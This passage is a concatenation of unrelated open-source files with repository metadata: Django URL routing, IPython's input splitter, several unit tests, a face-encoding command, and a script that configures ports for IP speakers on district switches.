(rx+r'apchoices/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<an>\w+)/(?P<field>\w+)$', views.ActionParamChoices.as_view()), # the thread_id can be a negative number: (rx+r'callbacks/(?P<thread_id>[\-0-9a-zA-Z]+)/(?P<button_id>\w+)$', views.Callbacks.as_view()), ) if self.use_eid_applet: urlpatterns += patterns('', (rx+r'eid-applet-service$', views.EidAppletService.as_view()), ) if self.use_jasmine: urlpatterns += patterns('', (rx+r'run-jasmine$', views.RunJasmine.as_view()), ) if self.user_model and self.use_tinymce: urlpatterns += patterns('', (rx+r'templates/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>\w+)/(?P<fldname>\w+)$', views.Templates.as_view()), (rx+r'templates/(?P<app_label>\w+)/(?P<actor>\w+)/(?P<pk>\w+)/(?P<fldname>\w+)/(?P<tplname>\w+)$', views.Templates.as_view()), ) return urlpatterns def get_patterns(self): self.startup() from djangosite.signals import database_ready database_ready.send(self) #~ self.logger.info("20130418 get_patterns()") from django.conf.urls import patterns, url, include urlpatterns = self.get_media_urls() if self.use_extjs and self.admin_prefix: urlpatterns += patterns('', ('^'+self.admin_prefix, include(self.get_ext_urls()))) if self.plain_prefix: urlpatterns += patterns('', ('^'+self.plain_prefix+"/", include(self.get_plain_urls())) ) if self.django_admin_prefix: # experimental from django.contrib import admin admin.autodiscover() urlpatterns += patterns('', ('^'+self.django_admin_prefix[1:]+"/", include(admin.site.urls)) ) if not self.plain_prefix: urlpatterns += self.get_plain_urls() if self.use_extjs and not self.admin_prefix: urlpatterns += self.get_ext_urls() #~ elif self.plain_prefix: #~ urlpatterns += self.get_pages_urls() #~ print 20131021, urlpatterns return urlpatterns def for_each_app(self,func,*args,**kw): """ Successor of :meth:`djangosite.Site.on_each_app`. This also loops over - apps that don't have a models module - inherited apps """ from django.utils.importlib import import_module for app_name in self.get_installed_apps(): app_mod = import_module(app_name) app = getattr(app_mod,'App',None) if app is not None and issubclass(app,ad.App) and app.extends: parent = import_module(app.extends) func(app.extends,parent,*args,**kw) func(app_name,app_mod,*args,**kw) def get_letter_date_text(self,today=None): """ Returns a string like "Eupen, den 26. August 2013". """ sc = self.site_config.site_company if today is None: today = datetime.date.today() from lino import dd if sc and sc.city: return _("%(place)s, %(date)s") % dict( place=unicode(sc.city.name), date=dd.fdl(today)) return dd.fdl(today) #~ def get_letter_margin_top_html(self,ar): #~ s = '<p class="Centered9pt">%s</p>' #~ s = s % self.site_config.site_company.get_address('<br/>') #~ return s #~ from lino.utils.config import find_config_file #~ logo_path = find_config_file('logo.jpg') #~ return '<img src="%s"/>' % logo_path #~ return '<img src="file://%s" />' % logo_path #~ def get_letter_margin_bottom_html(self,ar): #~ s = '<p class="Centered9pt">%s</p>' #~ s = s % self.site_config.site_company.get_address('<br/>') #~ return s #~ return '' def get_admin_main_items(self,ar): """ Yield a sequence of "items" to be rendered in :xfile:`admin_main.html`. """ return [] #~ def make_url_tester(self): #~ from lino.utils.test import URLTester #~ return URLTester()
gpl-3.0
1,687,644,786,316,544,300
33.001948
128
0.581512
false
sserrot/champion_relationships
venv/Lib/site-packages/IPython/core/inputsplitter.py
1
28155
"""DEPRECATED: Input handling and transformation machinery. This module was deprecated in IPython 7.0, in favour of inputtransformer2. The first class in this module, :class:`InputSplitter`, is designed to tell when input from a line-oriented frontend is complete and should be executed, and when the user should be prompted for another line of code instead. The name 'input splitter' is largely for historical reasons. A companion, :class:`IPythonInputSplitter`, provides the same functionality but with full support for the extended IPython syntax (magics, system calls, etc). The code to actually do these transformations is in :mod:`IPython.core.inputtransformer`. :class:`IPythonInputSplitter` feeds the raw code to the transformers in order and stores the results. For more details, see the class docstrings below. """ from warnings import warn warn('IPython.core.inputsplitter is deprecated since IPython 7 in favor of `IPython.core.inputtransformer2`', DeprecationWarning) # Copyright (c) IPython Development Team. # Distributed under the terms of the Modified BSD License. import ast import codeop import io import re import sys import tokenize import warnings from IPython.core.inputtransformer import (leading_indent, classic_prompt, ipy_prompt, cellmagic, assemble_logical_lines, help_end, escaped_commands, assign_from_magic, assign_from_system, assemble_python_lines, ) # These are available in this module for backwards compatibility. from IPython.core.inputtransformer import (ESC_SHELL, ESC_SH_CAP, ESC_HELP, ESC_HELP2, ESC_MAGIC, ESC_MAGIC2, ESC_QUOTE, ESC_QUOTE2, ESC_PAREN, ESC_SEQUENCES) #----------------------------------------------------------------------------- # Utilities #----------------------------------------------------------------------------- # FIXME: These are general-purpose utilities that later can be moved to the # general ward. Kept here for now because we're being very strict about test # coverage with this code, and this lets us ensure that we keep 100% coverage # while developing. # compiled regexps for autoindent management dedent_re = re.compile('|'.join([ r'^\s+raise(\s.*)?$', # raise statement (+ space + other stuff, maybe) r'^\s+raise\([^\)]*\).*$', # wacky raise with immediate open paren r'^\s+return(\s.*)?$', # normal return (+ space + other stuff, maybe) r'^\s+return\([^\)]*\).*$', # wacky return with immediate open paren r'^\s+pass\s*$', # pass (optionally followed by trailing spaces) r'^\s+break\s*$', # break (optionally followed by trailing spaces) r'^\s+continue\s*$', # continue (optionally followed by trailing spaces) ])) ini_spaces_re = re.compile(r'^([ \t\r\f\v]+)') # regexp to match pure comment lines so we don't accidentally insert 'if 1:' # before pure comments comment_line_re = re.compile(r'^\s*\#') def num_ini_spaces(s): """Return the number of initial spaces in a string. Note that tabs are counted as a single space. For now, we do *not* support mixing of tabs and spaces in the user's input. Parameters ---------- s : string Returns ------- n : int """ ini_spaces = ini_spaces_re.match(s) if ini_spaces: return ini_spaces.end() else: return 0 # Fake token types for partial_tokenize: INCOMPLETE_STRING = tokenize.N_TOKENS IN_MULTILINE_STATEMENT = tokenize.N_TOKENS + 1 # The 2 classes below have the same API as TokenInfo, but don't try to look up # a token type name that they won't find. class IncompleteString: type = exact_type = INCOMPLETE_STRING def __init__(self, s, start, end, line): self.s = s self.start = start self.end = end self.line = line class InMultilineStatement: type = exact_type = IN_MULTILINE_STATEMENT def __init__(self, pos, line): self.s = '' self.start = self.end = pos self.line = line def partial_tokens(s): """Iterate over tokens from a possibly-incomplete string of code. This adds two special token types: INCOMPLETE_STRING and IN_MULTILINE_STATEMENT. These can only occur as the last token yielded, and represent the two main ways for code to be incomplete. """ readline = io.StringIO(s).readline token = tokenize.TokenInfo(tokenize.NEWLINE, '', (1, 0), (1, 0), '') try: for token in tokenize.generate_tokens(readline): yield token except tokenize.TokenError as e: # catch EOF error lines = s.splitlines(keepends=True) end = len(lines), len(lines[-1]) if 'multi-line string' in e.args[0]: l, c = start = token.end s = lines[l-1][c:] + ''.join(lines[l:]) yield IncompleteString(s, start, end, lines[-1]) elif 'multi-line statement' in e.args[0]: yield InMultilineStatement(end, lines[-1]) else: raise def find_next_indent(code): """Find the number of spaces for the next line of indentation""" tokens = list(partial_tokens(code)) if tokens[-1].type == tokenize.ENDMARKER: tokens.pop() if not tokens: return 0 while (tokens[-1].type in {tokenize.DEDENT, tokenize.NEWLINE, tokenize.COMMENT}): tokens.pop() if tokens[-1].type == INCOMPLETE_STRING: # Inside a multiline string return 0 # Find the indents used before prev_indents = [0] def _add_indent(n): if n != prev_indents[-1]: prev_indents.append(n) tokiter = iter(tokens) for tok in tokiter: if tok.type in {tokenize.INDENT, tokenize.DEDENT}: _add_indent(tok.end[1]) elif (tok.type == tokenize.NL): try: _add_indent(next(tokiter).start[1]) except StopIteration: break last_indent = prev_indents.pop() # If we've just opened a multiline statement (e.g. 'a = ['), indent more if tokens[-1].type == IN_MULTILINE_STATEMENT: if tokens[-2].exact_type in {tokenize.LPAR, tokenize.LSQB, tokenize.LBRACE}: return last_indent + 4 return last_indent if tokens[-1].exact_type == tokenize.COLON: # Line ends with colon - indent return last_indent + 4 if last_indent: # Examine the last line for dedent cues - statements like return or # raise which normally end a block of code. last_line_starts = 0 for i, tok in enumerate(tokens): if tok.type == tokenize.NEWLINE: last_line_starts = i + 1 last_line_tokens = tokens[last_line_starts:] names = [t.string for t in last_line_tokens if t.type == tokenize.NAME] if names and names[0] in {'raise', 'return', 'pass', 'break', 'continue'}: # Find the most recent indentation less than the current level for indent in reversed(prev_indents): if indent < last_indent: return indent return last_indent def last_blank(src): """Determine if the input source ends in a blank. A blank is either a newline or a line consisting of whitespace. Parameters ---------- src : string A single or multiline string. """ if not src: return False ll = src.splitlines()[-1] return (ll == '') or ll.isspace() last_two_blanks_re = re.compile(r'\n\s*\n\s*$', re.MULTILINE) last_two_blanks_re2 = re.compile(r'.+\n\s*\n\s+$', re.MULTILINE) def last_two_blanks(src): """Determine if the input source ends in two blanks. A blank is either a newline or a line consisting of whitespace. Parameters ---------- src : string A single or multiline string. """ if not src: return False # The logic here is tricky: I couldn't get a regexp to work and pass all # the tests, so I took a different approach: split the source by lines, # grab the last two and prepend '###\n' as a stand-in for whatever was in # the body before the last two lines. Then, with that structure, it's # possible to analyze with two regexps. Not the most elegant solution, but # it works. If anyone tries to change this logic, make sure to validate # the whole test suite first! new_src = '\n'.join(['###\n'] + src.splitlines()[-2:]) return (bool(last_two_blanks_re.match(new_src)) or bool(last_two_blanks_re2.match(new_src)) ) def remove_comments(src): """Remove all comments from input source. Note: comments are NOT recognized inside of strings! Parameters ---------- src : string A single or multiline input string. Returns ------- String with all Python comments removed. """ return re.sub('#.*', '', src) def get_input_encoding(): """Return the default standard input encoding. If sys.stdin has no encoding, 'ascii' is returned.""" # There are strange environments for which sys.stdin.encoding is None. We # ensure that a valid encoding is returned. encoding = getattr(sys.stdin, 'encoding', None) if encoding is None: encoding = 'ascii' return encoding #----------------------------------------------------------------------------- # Classes and functions for normal Python syntax handling #----------------------------------------------------------------------------- class InputSplitter(object): r"""An object that can accumulate lines of Python source before execution. This object is designed to be fed python source line-by-line, using :meth:`push`. It will return on each push whether the currently pushed code could be executed already. In addition, it provides a method called :meth:`push_accepts_more` that can be used to query whether more input can be pushed into a single interactive block. This is a simple example of how an interactive terminal-based client can use this tool:: isp = InputSplitter() while isp.push_accepts_more(): indent = ' '*isp.indent_spaces prompt = '>>> ' + indent line = indent + raw_input(prompt) isp.push(line) print 'Input source was:\n', isp.source_reset(), """ # A cache for storing the current indentation # The first value stores the most recently processed source input # The second value is the number of spaces for the current indentation # If self.source matches the first value, the second value is a valid # current indentation. Otherwise, the cache is invalid and the indentation # must be recalculated. _indent_spaces_cache = None, None # String, indicating the default input encoding. It is computed by default # at initialization time via get_input_encoding(), but it can be reset by a # client with specific knowledge of the encoding. encoding = '' # String where the current full source input is stored, properly encoded. # Reading this attribute is the normal way of querying the currently pushed # source code, that has been properly encoded. source = '' # Code object corresponding to the current source. It is automatically # synced to the source, so it can be queried at any time to obtain the code # object; it will be None if the source doesn't compile to valid Python. code = None # Private attributes # List with lines of input accumulated so far _buffer = None # Command compiler _compile = None # Boolean indicating whether the current block is complete _is_complete = None # Boolean indicating whether the current block has an unrecoverable syntax error _is_invalid = False def __init__(self): """Create a new InputSplitter instance. """ self._buffer = [] self._compile = codeop.CommandCompiler() self.encoding = get_input_encoding() def reset(self): """Reset the input buffer and associated state.""" self._buffer[:] = [] self.source = '' self.code = None self._is_complete = False self._is_invalid = False def source_reset(self): """Return the input source and perform a full reset. """ out = self.source self.reset() return out def check_complete(self, source): """Return whether a block of code is ready to execute, or should be continued This is a non-stateful API, and will reset the state of this InputSplitter. Parameters ---------- source : string Python input code, which can be multiline. Returns ------- status : str One of 'complete', 'incomplete', or 'invalid' if source is not a prefix of valid code. indent_spaces : int or None The number of spaces by which to indent the next line of code. If status is not 'incomplete', this is None. """ self.reset() try: self.push(source) except SyntaxError: # Transformers in IPythonInputSplitter can raise SyntaxError, # which push() will not catch. return 'invalid', None else: if self._is_invalid: return 'invalid', None elif self.push_accepts_more(): return 'incomplete', self.get_indent_spaces() else: return 'complete', None finally: self.reset() def push(self, lines:str) -> bool: """Push one or more lines of input. This stores the given lines and returns a status code indicating whether the code forms a complete Python block or not. Any exceptions generated in compilation are swallowed, but if an exception was produced, the method returns True. Parameters ---------- lines : string One or more lines of Python input. Returns ------- is_complete : boolean True if the current input source (the result of the current input plus prior inputs) forms a complete Python execution block. Note that this value is also stored as a private attribute (``_is_complete``), so it can be queried at any time. """ assert isinstance(lines, str) self._store(lines) source = self.source # Before calling _compile(), reset the code object to None so that if an # exception is raised in compilation, we don't mislead by having # inconsistent code/source attributes. self.code, self._is_complete = None, None self._is_invalid = False # Honor termination lines properly if source.endswith('\\\n'): return False try: with warnings.catch_warnings(): warnings.simplefilter('error', SyntaxWarning) self.code = self._compile(source, symbol="exec") # Invalid syntax can produce any of a number of different errors from # inside the compiler, so we have to catch them all. Syntax errors # immediately produce a 'ready' block, so the invalid Python can be # sent to the kernel for evaluation with possible ipython # special-syntax conversion. except (SyntaxError, OverflowError, ValueError, TypeError, MemoryError, SyntaxWarning): self._is_complete = True self._is_invalid = True else: # Compilation didn't produce any exceptions (though it may not have # given a complete code object) self._is_complete = self.code is not None return self._is_complete def push_accepts_more(self): """Return whether a block of interactive input can accept more input. This method is meant to be used by line-oriented frontends, who need to guess whether a block is complete or not based solely on prior and current input lines. The InputSplitter considers it has a complete interactive block and will not accept more input when either: * A SyntaxError is raised * The code is complete and consists of a single line or a single non-compound statement * The code is complete and has a blank line at the end If the current input produces a syntax error, this method immediately returns False but does *not* raise the syntax error exception, as typically clients will want to send invalid syntax to an execution backend which might convert the invalid syntax into valid Python via one of the dynamic IPython mechanisms. """ # With incomplete input, unconditionally accept more # A syntax error also sets _is_complete to True - see push() if not self._is_complete: #print("Not complete") # debug return True # The user can make any (complete) input execute by leaving a blank line last_line = self.source.splitlines()[-1] if (not last_line) or last_line.isspace(): #print("Blank line") # debug return False # If there's just a single line or AST node, and we're flush left, as is # the case after a simple statement such as 'a=1', we want to execute it # straight away. if self.get_indent_spaces() == 0: if len(self.source.splitlines()) <= 1: return False try: code_ast = ast.parse(u''.join(self._buffer)) except Exception: #print("Can't parse AST") # debug return False else: if len(code_ast.body) == 1 and \ not hasattr(code_ast.body[0], 'body'): #print("Simple statement") # debug return False # General fallback - accept more code return True def get_indent_spaces(self): sourcefor, n = self._indent_spaces_cache if sourcefor == self.source: return n # self.source always has a trailing newline n = find_next_indent(self.source[:-1]) self._indent_spaces_cache = (self.source, n) return n # Backwards compatibility. I think all code that used .indent_spaces was # inside IPython, but we can leave this here until IPython 7 in case any # other modules are using it. -TK, November 2017 indent_spaces = property(get_indent_spaces) def _store(self, lines, buffer=None, store='source'): """Store one or more lines of input. If input lines are not newline-terminated, a newline is automatically appended.""" if buffer is None: buffer = self._buffer if lines.endswith('\n'): buffer.append(lines) else: buffer.append(lines+'\n') setattr(self, store, self._set_source(buffer)) def _set_source(self, buffer): return u''.join(buffer) class IPythonInputSplitter(InputSplitter): """An input splitter that recognizes all of IPython's special syntax.""" # String with raw, untransformed input. source_raw = '' # Flag to track when a transformer has stored input that it hasn't given # back yet. transformer_accumulating = False # Flag to track when assemble_python_lines has stored input that it hasn't # given back yet. within_python_line = False # Private attributes # List with lines of raw input accumulated so far. _buffer_raw = None def __init__(self, line_input_checker=True, physical_line_transforms=None, logical_line_transforms=None, python_line_transforms=None): super(IPythonInputSplitter, self).__init__() self._buffer_raw = [] self._validate = True if physical_line_transforms is not None: self.physical_line_transforms = physical_line_transforms else: self.physical_line_transforms = [ leading_indent(), classic_prompt(), ipy_prompt(), cellmagic(end_on_blank_line=line_input_checker), ] self.assemble_logical_lines = assemble_logical_lines() if logical_line_transforms is not None: self.logical_line_transforms = logical_line_transforms else: self.logical_line_transforms = [ help_end(), escaped_commands(), assign_from_magic(), assign_from_system(), ] self.assemble_python_lines = assemble_python_lines() if python_line_transforms is not None: self.python_line_transforms = python_line_transforms else: # We don't use any of these at present self.python_line_transforms = [] @property def transforms(self): "Quick access to all transformers." return self.physical_line_transforms + \ [self.assemble_logical_lines] + self.logical_line_transforms + \ [self.assemble_python_lines] + self.python_line_transforms @property def transforms_in_use(self): """Transformers, excluding logical line transformers if we're in a Python line.""" t = self.physical_line_transforms[:] if not self.within_python_line: t += [self.assemble_logical_lines] + self.logical_line_transforms return t + [self.assemble_python_lines] + self.python_line_transforms def reset(self): """Reset the input buffer and associated state.""" super(IPythonInputSplitter, self).reset() self._buffer_raw[:] = [] self.source_raw = '' self.transformer_accumulating = False self.within_python_line = False for t in self.transforms: try: t.reset() except SyntaxError: # Nothing that calls reset() expects to handle transformer # errors pass def flush_transformers(self): def _flush(transform, outs): """yield transformed lines always strings, never None transform: the current transform outs: an iterable of previously transformed inputs. Each may be multiline, which will be passed one line at a time to transform. """ for out in outs: for line in out.splitlines(): # push one line at a time tmp = transform.push(line) if tmp is not None: yield tmp # reset the transform tmp = transform.reset() if tmp is not None: yield tmp out = [] for t in self.transforms_in_use: out = _flush(t, out) out = list(out) if out: self._store('\n'.join(out)) def raw_reset(self): """Return raw input only and perform a full reset. """ out = self.source_raw self.reset() return out def source_reset(self): try: self.flush_transformers() return self.source finally: self.reset() def push_accepts_more(self): if self.transformer_accumulating: return True else: return super(IPythonInputSplitter, self).push_accepts_more() def transform_cell(self, cell): """Process and translate a cell of input. """ self.reset() try: self.push(cell) self.flush_transformers() return self.source finally: self.reset() def push(self, lines:str) -> bool: """Push one or more lines of IPython input. This stores the given lines and returns a status code indicating whether the code forms a complete Python block or not, after processing all input lines for special IPython syntax. Any exceptions generated in compilation are swallowed, but if an exception was produced, the method returns True. Parameters ---------- lines : string One or more lines of Python input. Returns ------- is_complete : boolean True if the current input source (the result of the current input plus prior inputs) forms a complete Python execution block. Note that this value is also stored as a private attribute (_is_complete), so it can be queried at any time. """ assert isinstance(lines, str) # We must ensure all input is pure unicode # ''.splitlines() --> [], but we need to push the empty line to transformers lines_list = lines.splitlines() if not lines_list: lines_list = [''] # Store raw source before applying any transformations to it. Note # that this must be done *after* the reset() call that would otherwise # flush the buffer. self._store(lines, self._buffer_raw, 'source_raw') transformed_lines_list = [] for line in lines_list: transformed = self._transform_line(line) if transformed is not None: transformed_lines_list.append(transformed) if transformed_lines_list: transformed_lines = '\n'.join(transformed_lines_list) return super(IPythonInputSplitter, self).push(transformed_lines) else: # Got nothing back from transformers - they must be waiting for # more input. return False def _transform_line(self, line): """Push a line of input code through the various transformers. Returns any output from the transformers, or None if a transformer is accumulating lines. Sets self.transformer_accumulating as a side effect. """ def _accumulating(dbg): #print(dbg) self.transformer_accumulating = True return None for transformer in self.physical_line_transforms: line = transformer.push(line) if line is None: return _accumulating(transformer) if not self.within_python_line: line = self.assemble_logical_lines.push(line) if line is None: return _accumulating('acc logical line') for transformer in self.logical_line_transforms: line = transformer.push(line) if line is None: return _accumulating(transformer) line = self.assemble_python_lines.push(line) if line is None: self.within_python_line = True return _accumulating('acc python line') else: self.within_python_line = False for transformer in self.python_line_transforms: line = transformer.push(line) if line is None: return _accumulating(transformer) #print("transformers clear") #debug self.transformer_accumulating = False return line
mit
8,784,860,315,369,942,000
35.470207
109
0.58764
false
HackToday/kolla
tests/test_build.py
1
3763
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. from mock import patch from os import path from oslo_log import fixture as log_fixture from oslo_log import log as logging from oslotest import base import sys sys.path.append(path.abspath(path.join(path.dirname(__file__), '../tools'))) from tools import build LOG = logging.getLogger(__name__) class BuildTest(base.BaseTestCase): def setUp(self): super(BuildTest, self).setUp() self.useFixture(log_fixture.SetLogLevel([__name__], logging.logging.INFO)) self.build_args = [__name__, "--debug"] def runTest(self): with patch.object(sys, 'argv', self.build_args): LOG.info("Running with args %s" % self.build_args) bad_results, good_results = build.main() # these are images that are known to not build properly excluded_images = ["gnocchi-api", "gnocchi-statsd"] failures = 0 for image, result in bad_results.iteritems(): if image in excluded_images: if result is 'error': continue failures = failures + 1 LOG.warning(">>> Expected image '%s' to fail, please update" " the excluded_images in source file above if the" " image build has been fixed." % image) else: if result is not 'error': continue failures = failures + 1 LOG.critical(">>> Expected image '%s' to succeed!" % image) self.assertEqual(failures, 0, "%d failure(s) occurred" % failures) class BuildTestCentosBinaryDocker(BuildTest): def setUp(self): super(BuildTestCentosBinaryDocker, self).setUp() self.build_args.extend(["--base", "centos", "--type", "binary"]) class BuildTestCentosSourceDocker(BuildTest): def setUp(self): super(BuildTestCentosSourceDocker, self).setUp() self.build_args.extend(["--base", "centos", "--type", "source"]) class BuildTestUbuntuSourceDocker(BuildTest): def setUp(self): super(BuildTestUbuntuSourceDocker, self).setUp() self.build_args.extend(["--base", "ubuntu", "--type", "source"]) class BuildTestCentosBinaryTemplate(BuildTest): def setUp(self): super(BuildTestCentosBinaryTemplate, self).setUp() self.build_args.extend(["--base", "centos", "--type", "binary", "--template"]) class BuildTestCentosSourceTemplate(BuildTest): def setUp(self): super(BuildTestCentosSourceTemplate, self).setUp() self.build_args.extend(["--base", "centos", "--type", "source", "--template"]) class BuildTestUbuntuSourceTemplate(BuildTest): def setUp(self): super(BuildTestUbuntuSourceTemplate, self).setUp() self.build_args.extend(["--base", "ubuntu", "--type", "source", "--template"])
apache-2.0
9,087,697,521,718,533,000
35.182692
78
0.575605
false
Ajapaik/ajapaik-web
ajapaik/ajapaik_face_recognition/management/commands/run_face_encoding_on_unencoded_rectangles.py
1
1387
import multiprocessing from json import loads, dumps import face_recognition from django.core.management.base import BaseCommand from ajapaik.ajapaik_face_recognition.models import FaceRecognitionRectangle def encode_single_rectangle(rectangle: FaceRecognitionRectangle) -> None: print('Processing rectangle %s' % rectangle.pk) try: image = face_recognition.load_image_file(rectangle.photo.image) except: # noqa return try: encodings = face_recognition.face_encodings(image, known_face_locations=[loads(rectangle.coordinates)]) except: # noqa return if len(encodings) == 1: my_encoding = encodings[0] try: rectangle.face_encoding = dumps(my_encoding.tolist()) rectangle.save() except: # noqa return else: print('Found % face encodings for rectangle %s, should find only 1' % (len(encodings), rectangle.id)) class Command(BaseCommand): help = 'Will run face encoding on all identified faces' args = 'subject_id' def handle(self, *args, **options): unknown_rectangles = FaceRecognitionRectangle.objects.filter(face_encoding__isnull=True).all() print('Found %s rectangles to run on' % unknown_rectangles.count()) with multiprocessing.Pool() as pool: pool.map(encode_single_rectangle, unknown_rectangles)
gpl-3.0
-8,899,417,717,405,903,000
34.564103
111
0.681327
false
bharadwajyarlagadda/bingmaps
tests/test_location_by_address_url_schema.py
1
2911
import pytest from bingmaps.apiservices import LocationByAddress from bingmaps.urls import LocationByAddressSchema from .fixtures import parametrize, BING_MAPS_KEY http_protocol = 'http' https_protocol = 'https' DATA = [{'adminDistrict': 'WA'}, {'key': 'vds'}, {'adminDistrict': 'WA', 'locality': 'Seattle', 'key': 'abs'}, {'adminDistrict': 'WA', 'locality': 'Seattle', 'key': BING_MAPS_KEY}, {'adminDistrict': 'WA', 'locality': 'Seattle', 'key': BING_MAPS_KEY}, {'adminDistrict': 'WA', 'locality': 'Seattle', 'o': 'xml', 'key': BING_MAPS_KEY} ] EXPECTED = [ True, False, 'adminDistrict=WA&locality=Seattle&includeNeighborhood=' '0&include=ciso2&maxResults=20&key=abs', 'http://dev.virtualearth.net/REST/v1/Locations?' 'adminDistrict=WA&locality=Seattle&includeNeighborhood=' '0&include=ciso2&maxResults=' '20&key={0}'.format(BING_MAPS_KEY), 'https://dev.virtualearth.net/REST/v1/Locations?' 'adminDistrict=WA&locality=Seattle&includeNeighborhood=' '0&include=ciso2&maxResults=' '20&key={0}'.format(BING_MAPS_KEY), 'https://dev.virtualearth.net/REST/v1/Locations?' 'adminDistrict=WA&locality=Seattle&o=xml&includeNeighborhood=' '0&include=ciso2&maxResults=' '20&key={0}'.format(BING_MAPS_KEY) ] @parametrize('data,expected', [ (DATA[0], EXPECTED[0]), (DATA[1], EXPECTED[1]) ]) def test_schema_without_key(data, expected): schema = LocationByAddressSchema() is_valid_schema = schema.validate(data) assert bool(is_valid_schema) is expected @parametrize('data,expected', [ (DATA[2], EXPECTED[2]) ]) def test_consolidate_query_dict(data, expected): query = LocationByAddressSchema() query_string = query.dump(data).data assert query_string['query'] == expected @parametrize('data,expected', [ (DATA[3], EXPECTED[3]) ]) def test_build_url_http_protocol(data, expected): loc_by_address = LocationByAddress(data, http_protocol) url = loc_by_address.build_url() assert url == expected @parametrize('data,expected', [ (DATA[4], EXPECTED[4]), (DATA[5], EXPECTED[5]) ]) def test_build_url_https_protocol(data, expected): loc_by_address = LocationByAddress(data, https_protocol) url = loc_by_address.build_url() assert url == expected @parametrize('data', [ (DATA[0]) ]) def test_schema_without_key_exception(data): with pytest.raises(KeyError) as exc: loc_by_address = LocationByAddress(data, https_protocol) schema = loc_by_address.build_url() assert exc == {'queryParameters': {'key': ['Please provide a key']}} @parametrize('data', [ ('') ]) def test_schema_no_data(data): with pytest.raises(TypeError) as exc: loc_by_address = LocationByAddress(data) assert exc == "No data given"
mit
-7,775,224,365,271,636,000
27.821782
76
0.643765
false
Tejal011089/trufil-erpnext
erpnext/stock/doctype/item/test_item.py
1
2870
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors # License: GNU General Public License v3. See license.txt from __future__ import unicode_literals import unittest import frappe from frappe.test_runner import make_test_records from erpnext.stock.doctype.item.item import WarehouseNotSet, ItemTemplateCannotHaveStock from erpnext.stock.doctype.stock_entry.test_stock_entry import make_stock_entry test_ignore = ["BOM"] test_dependencies = ["Warehouse"] def make_item(item_code, properties=None): if frappe.db.exists("Item", item_code): return frappe.get_doc("Item", item_code) item = frappe.get_doc({ "doctype": "Item", "item_code": item_code, "item_name": item_code, "description": item_code, "item_group": "Products" }) if properties: item.update(properties) if item.is_stock_item and not item.default_warehouse: item.default_warehouse = "_Test Warehouse - _TC" item.insert() return item class TestItem(unittest.TestCase): def get_item(self, idx): item_code = test_records[idx].get("item_code") if not frappe.db.exists("Item", item_code): item = frappe.copy_doc(test_records[idx]) item.insert() else: item = frappe.get_doc("Item", item_code) return item def test_template_cannot_have_stock(self): item = self.get_item(10) make_stock_entry(item_code=item.name, target="Stores - _TC", qty=1, incoming_rate=1) item.has_variants = 1 self.assertRaises(ItemTemplateCannotHaveStock, item.save) def test_default_warehouse(self): item = frappe.copy_doc(test_records[0]) item.is_stock_item = 1 item.default_warehouse = None self.assertRaises(WarehouseNotSet, item.insert) def test_get_item_details(self): from erpnext.stock.get_item_details import get_item_details to_check = { "item_code": "_Test Item", "item_name": "_Test Item", "description": "_Test Item 1", "warehouse": "_Test Warehouse - _TC", "income_account": "Sales - _TC", "expense_account": "_Test Account Cost for Goods Sold - _TC", "cost_center": "_Test Cost Center 2 - _TC", "qty": 1.0, "price_list_rate": 100.0, "base_price_list_rate": 0.0, "discount_percentage": 0.0, "rate": 0.0, "base_rate": 0.0, "amount": 0.0, "base_amount": 0.0, "batch_no": None, "item_tax_rate": '{}', "uom": "_Test UOM", "conversion_factor": 1.0, } make_test_records("Item Price") details = get_item_details({ "item_code": "_Test Item", "company": "_Test Company", "price_list": "_Test Price List", "currency": "_Test Currency", "parenttype": "Sales Order", "conversion_rate": 1, "price_list_currency": "_Test Currency", "plc_conversion_rate": 1, "order_type": "Sales", "transaction_type": "selling" }) for key, value in to_check.iteritems(): self.assertEquals(value, details.get(key)) test_records = frappe.get_test_records('Item')
agpl-3.0
-5,232,201,362,335,797,000
27.137255
88
0.674913
false
dcrozier/PyTest
IT Management/ssfusd_speaker_finder.py
1
3343
import yaml import os import sys import re import library import csv from collections import defaultdict import netaddr from multiprocessing.pool import ThreadPool print("Post Deployment - South San Francisco") # Checks for site yaml file if not os.path.isfile('yamls\\SSFUSD.yml'): sys.exit('Site not setup, run setup_site.py') # Loads access info with open('yamls\\SSFUSD.yml', 'r+') as f: saved_data = yaml.load(f) with open('saved data\\oui_discovery.yml', 'r') as f: oui_discovery = yaml.load(f) for ip in saved_data.iplist: print(ip.format()) # ID Device print("Discovering Device") sysName = library.get(saved_data.community_string, ip.format(), 'SNMPv2-MIB', 'sysDescr') if not sysName: continue # Checks if Cisco Device if 'cisco' in sysName[0][0].lower(): print('Skipping cisco device') continue chan, ssh = library.login(ip.format(), saved_data.username, saved_data.psk) if ssh == 0: continue running_config = library.get_running_config(chan, saved_data.enable) # Loads MAC-Table print("Loading MAC Table"), cam_table = library.get(saved_data.community_string, ip.format(), 'BRIDGE-MIB', 'dot1dTpFdbPort') print("MAC Table Loaded") # Loads Interface Index table print("Loading interface index"), ifIndex = library.get(saved_data.community_string, ip.format(), 'IF-MIB', 'ifIndex') ifName = library.get(saved_data.community_string, ip.format(), 'IF-MIB', 'ifName') print("Interface index Loaded") # Initialize interface class print("Organizing data") interface_record = {} for i in range(len(ifIndex[0])): interface_record[ifIndex[0][i]] = library.Interface(ifIndex[0][i], ifName[0][i]) # Appends MAC addresses table to the interface class for i in range(len(cam_table[0])): mac = re.search(r'[0-9:a-fA-F]{17}', cam_table[1][i]).group() interface_record[cam_table[0][i]].mac_table.append(netaddr.EUI(mac)) library.send_command('flow-control', chan=chan, configure=True) interface_configs = running_config.find_objects(r'interface.*') # Searches for live mac address and configures based on spreadsheet print("Searching interfaces for devices") for interface in sorted(interface_record): for mac in interface_record[interface].mac_table: for search in oui_discovery.items(): try: if mac.oui in search[1]: if interface_record[interface].flag is 'switch': continue interface_record[interface].flag = search[0].lower() print("Interface {0}: MAC {1}: Flag: {2}".format( interface_record[interface].ifName, str(mac), interface_record[interface].flag) ) except netaddr.NotRegisteredError: pass for interface in sorted(interface_record): if interface_record[interface].flag == 'ip_speaker': library.send_command(interface_record[interface].command_name, 'port-name **** SPEAKER ****', chan=chan, configure=True) 